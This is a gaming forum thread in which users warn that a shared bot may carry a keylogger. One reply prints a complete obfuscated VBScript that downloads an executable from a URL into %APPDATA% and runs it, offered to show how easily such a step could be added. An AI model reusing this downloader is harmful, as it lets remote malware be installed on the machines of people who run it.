Jump to content

Recommended Posts

Posted

Well, its doing his job... but sadly after 1-2 hrs it's requesting a new google token, kind of stupid if you want to leave it during the night online :(


PS: Just wanted a smurf :(

Posted

Well, its doing his job... but sadly after 1-2 hrs it's requesting a new google token, kind of stupid if you want to leave it during the night online :(

 

 

PS: Just wanted a smurf :(

Then use Ptc

 

 

This is not about the bot but general. The bans reach 24 hours.

Posted

 

he is using something you will be using in 4 years if you're lucky enough.

 

Iphone13? A futuristic Tablet? Holographic device? I'm trying to think but i can't sir. Can you help me by telling me what Mr. Xdem is using ? Thanks in advance.

Posted (edited)

Watch out for vorfin (infamous byte) keylogger

 

If he got access to the source then he can easily implement a keylogger and share it here in mxc.

 

If you get your passwords hacked then you know who is the culplrit!

 

Good luck and happy hacking! (or get happy hacked LOL)

gQHui.png

 

This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.

Edited by Karasu_
Posted

Watch out for vorfin (infamous byte) keylogger

 

If he got access to the source then he can easily implement a keylogger and share it here in mxc.

 

If you get your passwords hacked then you know who is the culplrit!

 

Good luck and happy hacking! (or get happy hacked LOL)

gQHui.png

 

This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.

https://www.virustotal.com/el/file/202afeb41f95282f90d74da43520cb76ae1c0989dc4089a2f2dcc42623fbad15/analysis/

 

c0841e9db71f41e5815f99550ee9181d.png

Posted (edited)

Watch out for vorfin (infamous byte) keylogger

 

If he got access to the source then he can easily implement a keylogger and share it here in mxc.

 

If you get your passwords hacked then you know who is the culplrit!

 

Good luck and happy hacking! (or get happy hacked LOL)

This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.

 

He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

don't worry. :-[

 

Edited by AccessDenied
Posted

He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

don't worry. :-[

 

Function rPicOdLs(lXIbUjEI)
Dim ggjZZpyX, MTAIBJTB
For ggjZZpyX = 1 To LenB(lXIbUjEI)
MTAIBJTB = MTAIBJTB & Chr(AscB(MidB(lXIbUjEI, ggjZZpyX, 1)))
Next
rPicOdLs = MTAIBJTB
End Function
Sub GcaGHONQ(nPsoiijt, hYSnoocJ)
Dim bgtlutVY: Set bgtlutVY = CreateObject("MSXML2.ServerXMLHTTP")
Dim IUKTVNrC: IUKTVNrC = "GET"
bgtlutVY.Open IUKTVNrC, nPsoiijt, False
bgtlutVY.Send
Dim CckSbTkR, iQCADmGv
Set iQCADmGv = CreateObject("Scripting.FileSystemObject").OpenTextFile(hYSnoocJ, 2, True)
iQCADmGv.WriteLine (rPicOdLs(bgtlutVY.ResponseBody))
iQCADmGv.Close()
Set bgtlutVY = Nothing
Set iQCADmGv = Nothing
End Sub
Dim cYczJszK: cYczJszK = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%APPDATA%") & "\Example.exe"
Dim XhDxOytZ: XhDxOytZ = "http://google.com/server.exe"
GcaGHONQ XhDxOytZ, cYczJszK
CreateObject("WScript.Shell").Run Chr(34) & cYczJszK & Chr(34)

really hard to add a downloader % execute exploit.

 

 

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now



  • Posts

    • All links at http://akumu.ru return 503 and most  mega upload dont exist. Any idea if this will get fixed?
    • You make me laugh... relax man, my clients have been using my package for years and haven't had any problems. Cheers!  
    • yes travor? I hope you don't delete this LINK, scammer, the proof that you sold it is inside. HASH MD5: F1B3722977A7E3720DC91D56203D4E39 https://www.mediafire.com/file/rma1p98juce3ust/travor-source.rar/file   I'm uploading it again because I'm sure you'll delete it. https://www.mediafire.com/file/h51kz9vlbj9tk8a/travor-source.rar/file L2Ext.vcproj.DESKTOP-I4LDE28.Mariano.user in ext2025-main.zip Modified 2025-07-15 L2Ext.vcproj.DESKTOP-I4LDE28.Mariano.user in  travor-source.rar Modified 2026-03-09 Explain this to the community, you damn scammer! YOUR PC IS: DESKTOP-I4LDE28 VERIFY: HASH CRC32 in two files. GG. <?xml version="1.0" encoding="windows-1250"?> <VisualStudioUserFile     ProjectType="Visual C++"     Version="8,00"     ShowAllFiles="false"     >     <Configurations>         <Configuration             Name="Debug|Win32"             >             <DebugSettings                 Command="$(TargetPath)"                 WorkingDirectory=""                 CommandArguments=""                 Attach="false"                 DebuggerType="3"                 Remote="1"                 RemoteMachine="DESKTOP-I4LDE28"                 RemoteCommand=""                 HttpUrl=""                 PDBPath=""                 SQLDebugging=""                 Environment=""                 EnvironmentMerge="true"                 DebuggerFlavor=""                 MPIRunCommand=""                 MPIRunArguments=""                 MPIRunWorkingDirectory=""                 ApplicationCommand=""                 ApplicationArguments=""                 ShimCommand=""                 MPIAcceptMode=""                 MPIAcceptFilter=""             />         </Configuration>         <Configuration             Name="Debug|x64"             >             <DebugSettings                 Command=""                 WorkingDirectory=""                 CommandArguments=""                 Attach="false"                 DebuggerType="3"                 Remote="1"                 RemoteMachine="DESKTOP-I4LDE28"                 RemoteCommand=""                 HttpUrl=""                 PDBPath=""                 SQLDebugging=""                 Environment=""                 EnvironmentMerge="true"                 DebuggerFlavor=""                 MPIRunCommand=""                 MPIRunArguments=""                 MPIRunWorkingDirectory=""                 ApplicationCommand=""                 ApplicationArguments=""                 ShimCommand=""                 MPIAcceptMode=""                 MPIAcceptFilter=""             />         </Configuration>         <Configuration             Name="Release|Win32"             >             <DebugSettings                 Command="$(TargetPath)"                 WorkingDirectory=""                 CommandArguments=""                 Attach="false"                 DebuggerType="3"                 Remote="1"                 RemoteMachine="DESKTOP-I4LDE28"                 RemoteCommand=""                 HttpUrl=""                 PDBPath=""                 SQLDebugging=""                 Environment=""                 EnvironmentMerge="true"                 DebuggerFlavor=""                 MPIRunCommand=""                 MPIRunArguments=""                 MPIRunWorkingDirectory=""                 ApplicationCommand=""                 ApplicationArguments=""                 ShimCommand=""                 MPIAcceptMode=""                 MPIAcceptFilter=""             />         </Configuration>         <Configuration             Name="Release|x64"             >             <DebugSettings                 Command=""                 WorkingDirectory=""                 CommandArguments=""                 Attach="false"                 DebuggerType="3"                 Remote="1"                 RemoteMachine="DESKTOP-I4LDE28"                 RemoteCommand=""                 HttpUrl=""                 PDBPath=""                 SQLDebugging=""                 Environment=""                 EnvironmentMerge="true"                 DebuggerFlavor=""                 MPIRunCommand=""                 MPIRunArguments=""                 MPIRunWorkingDirectory=""                 ApplicationCommand=""                 ApplicationArguments=""                 ShimCommand=""                 MPIAcceptMode=""                 MPIAcceptFilter=""             />         </Configuration>     </Configurations> </VisualStudioUserFile> I HOPE YOU GET BANNED FROM THE FORUM, YOU'RE A SCAMMER AND A LIAR.  
    • Here we go again to teach!  The source code he mentions (backdoor) is from the leaked Travor files. I'm going to share another link with the community where you can compare and verify them. Source Travor files: https://www.mediafire.com/file/rma1p98juce3ust/travor-source.rar/file It should also be clarified that the person using this source can only comment on that and it will have no effect. Regards!
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..